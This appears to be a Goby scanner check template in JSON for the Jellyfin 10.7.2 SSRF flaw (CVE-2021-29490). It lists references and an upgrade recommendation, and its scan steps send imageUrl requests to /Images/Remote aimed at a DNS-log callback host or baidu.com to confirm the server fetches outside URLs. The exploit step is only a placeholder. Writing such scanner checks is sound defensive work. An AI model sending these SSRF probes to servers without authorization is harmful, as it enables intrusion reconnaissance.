{
"Name": "Jellyfin 10.7.2 SSRF CVE-2021-29490",
"Level": "1",
"Tags": [
"ssrf"
],
"GobyQuery": "title=\"Jellyfin\"",
"Description": "Jellyfin is the volunteer-built media solution that puts you in control of your media. Stream to any device from your own server, with no strings attached.",
"Product": "Jellyfin",
"Homepage": "https://jellyfin.org/",
"Author": "",
"Impact": "Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.",
"Recommendation": "Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints \"/Items/*/RemoteImages/Download\", \"/Items/RemoteSearch/Image\" and \"/Images/Remote\". Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-29490",
"https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96",
"https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485439&idx=3&sn=4bd6fc982541ca3ec610856c37a36c14"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/Images/Remote?imageUrl=http://{{{check}}}",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": [
"check|dnslog|4|15"
]
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$dns",
"operation": "contains",
"value": "{{{check}}}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/Images/Remote?imageUrl=http://www.baidu.com",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "百度",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}